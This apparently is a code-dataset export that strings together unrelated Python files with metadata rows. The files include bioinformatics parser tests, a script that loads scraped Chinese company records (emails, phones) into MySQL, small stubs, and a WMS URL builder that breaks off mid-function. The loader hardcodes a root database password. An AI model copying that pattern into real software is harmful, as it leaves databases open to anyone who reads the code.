with patch.object(builtins, 'open', mockOpener):
reader = JSONRecordsReader('file.json')
alignments = list(reader.readAlignments(reads))
self.assertEqual(4, len(alignments))
def testCorrectNumberOfAlignmentsTwoMatchesMissingEnd(self):
"""
A JSONRecordsReader must return the expected number of alignments, if
two reads at the end don't have any matches. (Those reads will not be
examined by the JSONRecordsReader.)
"""
reads = Reads([
AARead(
'id1 1',
'AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGTTTTCGGGG'
'GTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGTGTTTTGTTGTGGTTGCG'),
AARead(
'id2 2',
'TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTCCTCTTTC'
'ACCACGAGTTAAACCATTAACATTATATTTTTCTATAATTATACCACTGGC'),
AARead(
'id3 3',
'ACCTCCGCCTCCCAGGTTCAAGCAATTCTCCTGCCTTAGCCTCCTGAATA'
'GCTGGGATTACAGGTATGCAGGAGGCTAAGGCAGGAGAATTGCTTGAACCT'),
AARead(
'id4 4',
'GAGGGTGGAGGTAACTGAGGAAGCAAAGGCTTGGAGACAGGGCCCCTCAT'
'AGCCAGTGAGTGCGCCATTTTCTTTGGAGCAATTGGGTGGGGAGATGGGGC'),
])
mockOpener = mock_open(read_data=JSON_TWO_END)
with patch.object(builtins, 'open', mockOpener):
reader = JSONRecordsReader('file.json')
alignments = list(reader.readAlignments(reads))
self.assertEqual(2, len(alignments))
def testSpacesMustBePreserved(self):
"""
A JSONRecordsReader must return the right query and subject titles,
even if they have spaces.
"""
reads = Reads([
AARead(
'id1 1',
'AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGTTTTCGGGG'
'GTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGTGTTTTGTTGTGGTTGCG'),
AARead(
'id2 2',
'TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTCCTCTTTC'
'ACCACGAGTTAAACCATTAACATTATATTTTTCTATAATTATACCACTGGC'),
AARead(
'id3 3',
'ACCTCCGCCTCCCAGGTTCAAGCAATTCTCCTGCCTTAGCCTCCTGAATA'
'GCTGGGATTACAGGTATGCAGGAGGCTAAGGCAGGAGAATTGCTTGAACCT'),
AARead(
'id4 4',
'GAGGGTGGAGGTAACTGAGGAAGCAAAGGCTTGGAGACAGGGCCCCTCAT'
'AGCCAGTGAGTGCGCCATTTTCTTTGGAGCAATTGGGTGGGGAGATGGGGC'),
])
mockOpener = mock_open(read_data=JSON_TWO_END)
with patch.object(builtins, 'open', mockOpener):
reader = JSONRecordsReader('file.json')
alignment = list(reader.readAlignments(reads))[0]
self.assertEqual('id1 1', alignment.read.id)
def testSpaceInReadIdNotInJSONRecord(self):
"""
A JSONRecordsReader must return the right query and subject titles,
when the read ids have spaces in them but the titles in the JSON have
been truncated at the first space (as in the SAM format output of the
BWA 'mem' command).
"""
reads = Reads([
AARead(
'id1 1',
'AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGTTTTCGGGG'
'GTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGTGTTTTGTTGTGGTTGCG'),
AARead(
'id2 2',
'TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTCCTCTTTC'
'ACCACGAGTTAAACCATTAACATTATATTTTTCTATAATTATACCACTGGC'),
AARead(
'id3 3',
'ACCTCCGCCTCCCAGGTTCAAGCAATTCTCCTGCCTTAGCCTCCTGAATA'
'GCTGGGATTACAGGTATGCAGGAGGCTAAGGCAGGAGAATTGCTTGAACCT'),
AARead(
'id4 4',
'GAGGGTGGAGGTAACTGAGGAAGCAAAGGCTTGGAGACAGGGCCCCTCAT'
'AGCCAGTGAGTGCGCCATTTTCTTTGGAGCAATTGGGTGGGGAGATGGGGC'),
])
mockOpener = mock_open(read_data=JSON)
with patch.object(builtins, 'open', mockOpener):
reader = JSONRecordsReader('file.json')
alignment = list(reader.readAlignments(reads))[0]
self.assertEqual('id1 1', alignment.read.id)
class TestDiamondTabularFormatToDicts(TestCase):
"""
Tests for the diamondTabularFormatToDicts function.
"""
def testDuplicatesInFieldNameList(self):
"""
If a field name list that contains duplicates is passed, the
DiamondTabularFormat __init__ function must raise a ValueError.
"""
error = '^field names contains duplicated names: a, b\\.$'
assertRaisesRegex(
self, ValueError, error,
DiamondTabularFormat, ['a', 'b', 'a', 'c', 'b'])
def testTooFewFields(self):
"""
If an input line does not have enough fields, a ValueError must be
raised.
"""
dtf = DiamondTabularFormat(['a', 'b', 'c'])
data = StringIO('a\tb\n')
error = (
r"^DIAMOND output line had 2 field values \(expected 3\)\. "
r"The offending input line was 'a\\tb\\n'\.")
assertRaisesRegex(
self, ValueError, error, list,
dtf.diamondTabularFormatToDicts(data))
def testTooManyFields(self):
"""
If an input line has too many fields, a ValueError must be raised.
"""
dtf = DiamondTabularFormat(['a', 'b'])
data = StringIO('a\tb\tc\n')
error = (
r"^DIAMOND output line had 3 field values \(expected 2\)\. "
r"The offending input line was 'a\\tb\\tc\\n'\.")
assertRaisesRegex(
self, ValueError, error, list,
dtf.diamondTabularFormatToDicts(data))
def testUnknownField(self):
"""
        An unknown field name must be passed through unconverted: the
        returned dict must contain the field name and its original string
        value, exactly as given in the field-name list and the input line.
"""
dtf = DiamondTabularFormat(['__blah__'])
data = StringIO('3.5\n')
(result,) = list(dtf.diamondTabularFormatToDicts(data))
self.assertEqual({'__blah__': '3.5'}, result)
def testConversions(self):
"""
The fields in input lines must be recognized and converted to their
correct types.
"""
fields = [
'bitscore',
'evalue',
'frame',
'identicalCount',
'positiveCount',
'qstart',
'qend',
'sstart',
'send',
'qseq',
]
data = StringIO(
('3.5 1.7 1 7 4 10 12 1 2 ACGT\n'
'3.6 1.8 2 8 5 11 13 2 3 TGCA').replace(' ', '\t') + '\n'
)
dtf = DiamondTabularFormat(fields)
(result1, result2) = list(dtf.diamondTabularFormatToDicts(data))
self.assertEqual(
{
'bitscore': 3.5,
'evalue': 1.7,
'frame': 1,
'identicalCount': 7,
'positiveCount': 4,
'qstart': 10,
'qend': 12,
'sstart': 1,
'send': 2,
'qseq': 'ACGT',
},
result1)
self.assertEqual(
{
'bitscore': 3.6,
'evalue': 1.8,
'frame': 2,
'identicalCount': 8,
'positiveCount': 5,
'qstart': 11,
'qend': 13,
'sstart': 2,
'send': 3,
'qseq': 'TGCA',
},
result2)
| 36.879671 | 79 | 0.419316 | 4,190 | 58,233 | 5.745107 | 0.111933 | 0.010469 | 0.019109 | 0.011839 | 0.805251 | 0.783026 | 0.768154 | 0.761673 | 0.759347 | 0.755941 | 0 | 0.084574 | 0.48081 | 58,233 | 1,578 | 80 | 36.903042 | 0.711616 | 0.061391 | 0 | 0.696645 | 0 | 0.007852 | 0.29205 | 0.103159 | 0 | 0 | 0 | 0 | 0.019986 | 1 | 0.014989 | false | 0 | 0.008565 | 0 | 0.02641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
"MIT"
] | null | null | null | jupyterhack/__init__.py | threemeninaboat3247/jupyterhack | 395dacba8630857153543e1d6ede40efac56ef42 | [
"MIT"
] | null | null | null | jupyterhack/__init__.py | threemeninaboat3247/jupyterhack | 395dacba8630857153543e1d6ede40efac56ef42 | [
"MIT"
] | null | null | null | from jupyterhack.MyGraph import MyGraphWindow as GraphWindow
from jupyterhack.MyView import getRoot
from jupyterhack.MyFunctions import differentiate,MyFitting | 53 | 60 | 0.893082 | 18 | 159 | 7.888889 | 0.666667 | 0.316901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081761 | 159 | 3 | 61 | 53 | 0.972603 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1aee0fb556efb144ce8825503e3e3af7403d5f74 | 7,696 | py | Python | KnowledgeMapping/SpiderExp/1-Code/qichacha_down/readQccExcel.py | nickliqian/ralph_doc_to_chinese | be120ce2bb94a8e8395630218985f5e51ae087d9 | [
"MIT"
] | 8 | 2018-05-22T01:11:33.000Z | 2020-03-19T01:44:55.000Z | KnowledgeMapping/SpiderExp/1-Code/qichacha_down/readQccExcel.py | yangliangguang/keep_learning | 47ab39c726cb28713ad22bf4cf39d6b146715910 | [
"MIT"
] | null | null | null | KnowledgeMapping/SpiderExp/1-Code/qichacha_down/readQccExcel.py | yangliangguang/keep_learning | 47ab39c726cb28713ad22bf4cf39d6b146715910 | [
"MIT"
] | 3 | 2018-07-25T09:31:53.000Z | 2019-09-14T14:05:31.000Z | import xlrd
import os
import pymysql
def check_file_format():
file_list = os.listdir(base_path)
file_list.sort()
exp_header_1 = ['企业名称', '省份', '城市', '统一社会信用代码', '法定代表人', '企业类型', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址', '电话号码', '电话号码(更多号码)']
exp_header_2 = ['企业名称', '法人', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址']
exp_header_3 = ['企业名称', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址']
exp_header_4 = ['企业名称', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '电话号码', '经营范围', '网址']
exp_header_5 = ['企业名称', '统一社会信用代码', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '电话号码', '经营范围', '网址']
exp_header_6 = ['企业名称', '统一社会信用代码', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '电话号码', '经营范围', '网址', '电话号码(含更多号码)']
exp_header_7 = ['企业名称', '省份', '城市', '统一社会信用代码', '法定代表人', '企业类型', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址', '电话号码(含更多号码)']
for i, file_name in enumerate(file_list):
file_path = os.path.join(base_path, file_name)
        data = xlrd.open_workbook(file_path)  # open the xls workbook
        table = data.sheets()[0]  # open the first sheet
        # nrows = table.nrows  # number of rows in the sheet
        header = table.row_values(0)  # header row
if header not in (exp_header_1, exp_header_2, exp_header_3, exp_header_4, exp_header_5, exp_header_6, exp_header_7):
print("[{}] {}: fail".format(i, file_name))
print("{} {}".format(len(header), header))
            print("header fields do not match any expected layout")
break
else:
print("[{}] {}: pass".format(i, file_name))
        # for i in range(nrows):  # iterate over data rows
        #     if i == 0:  # skip the header row
        #         continue
        #     print(table.row_values(i)[:13])  # take the first thirteen columns
print("file count: {}".format(len(file_list)))
def main():
exp_header_1 = ['企业名称', '省份', '城市', '统一社会信用代码', '法定代表人', '企业类型', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址', '电话号码', '电话号码(更多号码)']
exp_header_2 = ['企业名称', '法人', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址']
exp_header_3 = ['企业名称', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址']
exp_header_4 = ['企业名称', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '电话号码', '经营范围', '网址']
exp_header_5 = ['企业名称', '统一社会信用代码', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '电话号码', '经营范围', '网址']
exp_header_6 = ['企业名称', '统一社会信用代码', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '电话号码', '经营范围', '网址', '电话号码(含更多号码)']
exp_header_7 = ['企业名称', '省份', '城市', '统一社会信用代码', '法定代表人', '企业类型', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址', '电话号码(含更多号码)']
print("Connect to mysql...")
m_conn = pymysql.connect(host='192.168.70.40', port=3306, user='root', passwd='mysql', db=mysql_db, charset='utf8')
m_cursor = m_conn.cursor()
try:
file_list = os.listdir(base_path)
file_list.sort()
for i, file_name in enumerate(file_list):
file_path = os.path.join(base_path, file_name)
            data = xlrd.open_workbook(file_path)  # open the xls workbook
            table = data.sheets()[0]  # open the first sheet
            nrows = table.nrows  # number of rows in the sheet
            header = table.row_values(0)  # header row
if header == exp_header_1:
print("{} {} {} {}".format(i, file_name, nrows, "exp_header_1"))
                for j in range(nrows):  # iterate over data rows
                    if j == 0:  # skip the header row
continue
data_list = table.row_values(j)
sql = "insert into qcc_info_1(company_name, province, city, credit_code, legal_person, company_type, establishment_date, registered_capital, address, email, business_scope, site, telephone, more_telephone) VALUE ({})".format(("%s,"*len(exp_header_1))[:-1])
m_cursor.execute(sql, data_list)
m_conn.commit()
elif header == exp_header_2:
print("{} {} {} {}".format(i, file_name, nrows, "exp_header_2"))
                for j in range(nrows):  # iterate over data rows
                    if j == 0:  # skip the header row
continue
data_list = table.row_values(j)
sql = "insert into qcc_info_2(company_name, legal_person, establishment_date, registered_capital, address, email, business_scope, site) VALUE ({})".format(("%s,"*len(exp_header_2))[:-1])
m_cursor.execute(sql, data_list)
m_conn.commit()
elif header == exp_header_3:
print("{} {} {} {}".format(i, file_name, nrows, "exp_header_3"))
                for j in range(nrows):  # iterate over data rows
                    if j == 0:  # skip the header row
continue
data_list = table.row_values(j)
sql = "insert into qcc_info_3(company_name, legal_person, establishment_date, registered_capital, address, email, business_scope, site) VALUE ({})".format(("%s,"*len(exp_header_3))[:-1])
m_cursor.execute(sql, data_list)
m_conn.commit()
elif header == exp_header_4:
print("{} {} {} {}".format(i, file_name, nrows, "exp_header_4"))
                for j in range(nrows):  # iterate over data rows
                    if j == 0:  # skip the header row
continue
data_list = table.row_values(j)
sql = "insert into qcc_info_4(company_name, legal_person, establishment_date, registered_capital, address, email, telephone, business_scope, site) VALUE ({})".format(("%s,"*len(exp_header_4))[:-1])
m_cursor.execute(sql, data_list)
m_conn.commit()
elif header == exp_header_5:
print("{} {} {} {}".format(i, file_name, nrows, "exp_header_5"))
                for j in range(nrows):  # iterate over data rows
                    if j == 0:  # skip the header row
continue
data_list = table.row_values(j)
sql = "insert into qcc_info_5(company_name, credit_code, legal_person, establishment_date, registered_capital, address, email, telephone, business_scope, site) VALUE ({})".format(("%s,"*len(exp_header_5))[:-1])
m_cursor.execute(sql, data_list)
m_conn.commit()
elif header == exp_header_6:
print("{} {} {} {}".format(i, file_name, nrows, "exp_header_6"))
                for j in range(nrows):  # iterate over data rows
                    if j == 0:  # skip the header row
continue
data_list = table.row_values(j)
sql = "insert into qcc_info_6(company_name, credit_code, legal_person, establishment_date, registered_capital, address, email, telephone, business_scope, site, more_telephone) VALUE ({})".format(("%s,"*len(exp_header_6))[:-1])
m_cursor.execute(sql, data_list)
m_conn.commit()
elif header == exp_header_7:
print("{} {} {} {}".format(i, file_name, nrows, "exp_header_7"))
                for j in range(nrows):  # iterate over data rows
                    if j == 0:  # skip the header row
continue
data_list = table.row_values(j)
sql = "insert into qcc_info_7(company_name, province, city, credit_code, legal_person, company_type, establishment_date, registered_capital, address, email, business_scope, site, more_telephone) VALUE ({})".format(("%s,"*len(exp_header_7))[:-1])
m_cursor.execute(sql, data_list)
m_conn.commit()
else:
                print("{} {} {} {}".format(i, file_name, nrows, "unexpected header layout"))
                raise TypeError("unexpected header layout")
finally:
m_cursor.close()
m_conn.close()
print("MySQL connection close...")
if __name__ == '__main__':
mysql_db = "qcc_tyc_index"
base_path = "/home/nick/Desktop/数据备份/qcc_tyc_download_data/down_file/"
main()
| 51.651007 | 276 | 0.536902 | 941 | 7,696 | 4.141339 | 0.146653 | 0.096998 | 0.035925 | 0.04311 | 0.836798 | 0.831665 | 0.82525 | 0.82525 | 0.754683 | 0.735694 | 0 | 0.0157 | 0.296518 | 7,696 | 148 | 277 | 52 | 0.7041 | 0.036383 | 0 | 0.6 | 0 | 0.058333 | 0.290183 | 0.030332 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016667 | false | 0.016667 | 0.025 | 0 | 0.041667 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2112cced3c83e351d019c48b2c79f67bc64b3eb7 | 164 | py | Python | learning.py | Derfei/huobi_tradingbot | 17d51e9b7358c1c26803caa81379f3aefd3f6a50 | [
"Apache-2.0"
] | null | null | null | learning.py | Derfei/huobi_tradingbot | 17d51e9b7358c1c26803caa81379f3aefd3f6a50 | [
"Apache-2.0"
] | null | null | null | learning.py | Derfei/huobi_tradingbot | 17d51e9b7358c1c26803caa81379f3aefd3f6a50 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
class Learning_Agent:
def __init__(self):
pass
def __load_data(self):
pass
def train(self):
pass | 13.666667 | 26 | 0.52439 | 19 | 164 | 4.105263 | 0.684211 | 0.307692 | 0.282051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009524 | 0.359756 | 164 | 12 | 27 | 13.666667 | 0.733333 | 0.128049 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0.428571 | 0 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
216948d4d282a0b83f9332ad8934f404482bad50 | 214 | py | Python | pystratis/api/coldstaking/responsemodels/addressmodel.py | TjadenFroyda/pyStratis | 9cc7620d7506637f8a2b84003d931eceb36ac5f2 | [
"MIT"
] | 8 | 2021-06-30T20:44:22.000Z | 2021-12-07T14:42:22.000Z | pystratis/api/coldstaking/responsemodels/addressmodel.py | TjadenFroyda/pyStratis | 9cc7620d7506637f8a2b84003d931eceb36ac5f2 | [
"MIT"
] | 2 | 2021-07-01T11:50:18.000Z | 2022-01-25T18:39:49.000Z | pystratis/api/coldstaking/responsemodels/addressmodel.py | TjadenFroyda/pyStratis | 9cc7620d7506637f8a2b84003d931eceb36ac5f2 | [
"MIT"
] | 4 | 2021-07-01T04:36:42.000Z | 2021-09-17T10:54:19.000Z | from pystratis.api import Model
from pystratis.core.types import Address
class AddressModel(Model):
"""A pydantic model for a cold staking address."""
address: Address
"""The cold staking address."""
| 23.777778 | 54 | 0.724299 | 28 | 214 | 5.535714 | 0.571429 | 0.167742 | 0.232258 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.17757 | 214 | 8 | 55 | 26.75 | 0.880682 | 0.205607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dcc4b26ad5a1e6cdfee54ab5dc27200cc65a867f | 22 | py | Python | main.py | MoYuStudio/Robot01 | 099c69dd6c80a83c1525bc57abbb1f7db04b7089 | [
"Apache-2.0"
] | null | null | null | main.py | MoYuStudio/Robot01 | 099c69dd6c80a83c1525bc57abbb1f7db04b7089 | [
"Apache-2.0"
] | null | null | null | main.py | MoYuStudio/Robot01 | 099c69dd6c80a83c1525bc57abbb1f7db04b7089 | [
"Apache-2.0"
] | null | null | null |
import pynput, time
| 5.5 | 19 | 0.727273 | 3 | 22 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227273 | 22 | 3 | 20 | 7.333333 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0d02f344811fd2a6d8cf1c6600e019cfc42d97c3 | 11,705 | py | Python | NGDAUpdater/BrowseGraphicInserter.py | mattCensus/PerlScripts | d2643d99abc3f0647ebfbd41f7e5faa704da3e91 | [
"MIT"
] | null | null | null | NGDAUpdater/BrowseGraphicInserter.py | mattCensus/PerlScripts | d2643d99abc3f0647ebfbd41f7e5faa704da3e91 | [
"MIT"
] | null | null | null | NGDAUpdater/BrowseGraphicInserter.py | mattCensus/PerlScripts | d2643d99abc3f0647ebfbd41f7e5faa704da3e91 | [
"MIT"
] | null | null | null |
import os
import fnmatch
import shutil
import re
import datetime
import time
#import StringIO
import pickle
import sys
def BrowseGraphicInserter(Theme, OutFile):
NewFile = OutFile
CurrentWMS='https://tigerweb.geo.census.gov/arcgis/rest/services/TIGERweb/tigerWMS_Current/MapServer/WmsServer?REQUEST=GetMap&SERVICE=WMS&VERSION=1.3.0'
Census2020='https://tigerweb.geo.census.gov/arcgis/rest/services/TIGERweb/tigerWMS_Census2020/MapServer?REQUEST=GetMap&SERVICE=WMS&VERSION=1.3.0'
PhysicalFeatures='https://tigerweb.geo.census.gov/arcgis/rest/services/TIGERweb/tigerWMS_PhysicalFeatures/MapServer'
    Format2EPSG='&STYLES=default,default&FORMAT=image/svg+xml&BGCOLOR=0xFFFFFF&TRANSPARENT=TRUE&CRS=EPSG:4326&'  # trailing '&' separates the BBOX parameter appended directly after this constant
WidthHeight ='&WIDTH=891&HEIGHT=751'
    # note: '&' must be written as '&amp;' if these URLs are embedded directly in XML
NewFile.write('<gmd:graphicOverview>\n')
NewFile.write('<gmd:MD_BrowseGraphic>\n')
NewFile.write('<gmd:fileName>\n')
    if re.search(r'State Legislative District \(SLD\) Upper Chamber', Theme, flags=0):
        GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS= 2018 State Legislative Districts - Upper, 2018 State Legislative Districts - Upper Labels' + Format2EPSG + 'BBOX=42.299053,-71.408142,42.35679,-70.798861' + WidthHeight + '</gco:CharacterString>'
        NewFile.write(GraphicURL)
elif re.search('State and Equivalent',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS= States, States Labels' + Format2EPSG + 'BBOX=32.860571,-113.5097542,46.389131,-113.509754' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('SubMinor Civil Division',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS= Subbarrios,Subbarrios Labels,Counties,Counties ' + Format2EPSG + 'BBOX=18.4271,-66.0859,18.4618,-66.0430' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
    elif re.search('Census Block', Theme, flags=0):
        GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS= 2020 Census Blocks,2020 Census Blocks Labels' + Format2EPSG + 'BBOX=42.499053,-71.897142,42.52679,-71.889999' + WidthHeight + '</gco:CharacterString>'
        NewFile.write(GraphicURL)
elif re.search('Census Tract',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Census Tracts,Census Tracts' + Format2EPSG + 'BBOX=41.187053,-72.508142,42.88679,-69.858861' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
    elif re.search(r'Urban Growth Area \(UGA\)', Theme, flags=0):
GraphicURL = '<gco:CharacterString>' + Census2020 + '&LAYERS=Urban Growth Areas,Urban Growth Areas Labels' + Format2EPSG + 'BBOX=42.006078,-124.520539,49.002494,-116.935343' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('AIANNH',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Off-Reservation Trust Lands,Off-Reservation Trust Lands Labels,State American Indian Reservations,State American Indian Reservations Labels,Hawaiian Home Lands,Hawaiian Home Lands Labels,Alaska Native Village Statistical Areas,Alaska Native Village Statistical Areas Labels,Federal American Indian Reservations,Federal American Indian Reservations Labels,Tribal Subdivisions,Tribal Subdivisions Labels,Oklahoma Tribal Statistical Areas,Oklahoma Tribal Statistical Areas Labels' + Format2EPSG + 'BBOX=+31.7134386,-112.0355607,+32.17347503,-111.640779' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('AITS',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Off-Reservation Trust Lands,Off-Reservation Trust Lands Labels,State American Indian Reservations,State American Indian Reservations Labels,Hawaiian Home Lands,Hawaiian Home Lands Labels,Alaska Native Village Statistical Areas,Alaska Native Village Statistical Areas Labels,Federal American Indian Reservations,Federal American Indian Reservations Labels,Tribal Subdivisions,Tribal Subdivisions Labels,Oklahoma Tribal Statistical Areas,Oklahoma Tribal Statistical Areas Labels' + Format2EPSG + 'BBOX=+31.7134386,-112.0355607,+32.17347503,-111.640779' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
    elif re.search(' Block Group', Theme, flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Census Block Groups,Census Block Groups Labels' + Format2EPSG + 'BBOX=+42.389053,-71.907142,42.52679,-71.879999' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('116th Congressional District',Theme, flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=116th Congressional Districts,116th Congressional Districts Labels' + Format2EPSG + 'BBOX=+32.860571,-113.5097542,46.389131,-113.509754' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
#116th Congressional Districts Consolidated City Consolidated Cities
elif re.search('Consolidated City', Theme, flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Consolidated Cities,Consolidated Cities Labels' + Format2EPSG + 'BBOX=+41.1581676,-073.1316819,+41.2909526,-072.97466503' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Census County and Equivalent',Theme,flags=0):
        GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Counties, Counties Labels' + Format2EPSG + 'BBOX=41.187053,-73.508142,42.88679,-69.858861' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('County Subdivision',Theme,flags=0):
        GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=County Subdivisions,County Subdivisions Labels' + Format2EPSG + 'BBOX=43.628449,-71.934903,43.706635,-71.346863' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search(' Elementary School District',Theme,flags=0):
        GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Elementary School Districts,Elementary School Districts Labels' + Format2EPSG + 'BBOX=+41.3255598,-073.0942359,+41.4663967,-072.8549872' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Census Place',Theme, flags=0):
        GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Census Designated Places,Census Designated Places Labels,Incorporated Places,Incorporated Places Labels' + Format2EPSG + 'BBOX=+42.299053,-71.408142,42.35679,-70.798861' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Current Place',Theme, flags=0):
        GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Census Designated Places,Census Designated Places Labels,Incorporated Places,Incorporated Places Labels' + Format2EPSG + 'BBOX=+42.299053,-71.408142,42.35679,-70.798861' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search ('Census Secondary School District',Theme, flags=0):
        GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Secondary School Districts,Secondary School Districts Labels' + Format2EPSG + 'BBOX=+11679625.942909468,4709198.547476525,-11645573.246808422,4737900.651597611' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Current Secondary School Districts', Theme, flags=0):
        GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Secondary School Districts,Secondary School Districts Labels' + Format2EPSG + 'BBOX=+11679625.942909468,4709198.547476525,-11645573.246808422,4737900.651597611' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
    elif re.search(r'State Legislative District \(SLD\) Lower Chamber', Theme, flags=0):
        GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=2018 State Legislative Districts - Lower,2018 State Legislative Districts - Lower Labels' + Format2EPSG + 'BBOX=+11679625.942909468,4709198.547476525,-11645573.246808422,4737900.651597611' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
    elif re.search(r'\(SLD\)Lower Chamber', Theme, flags=0):
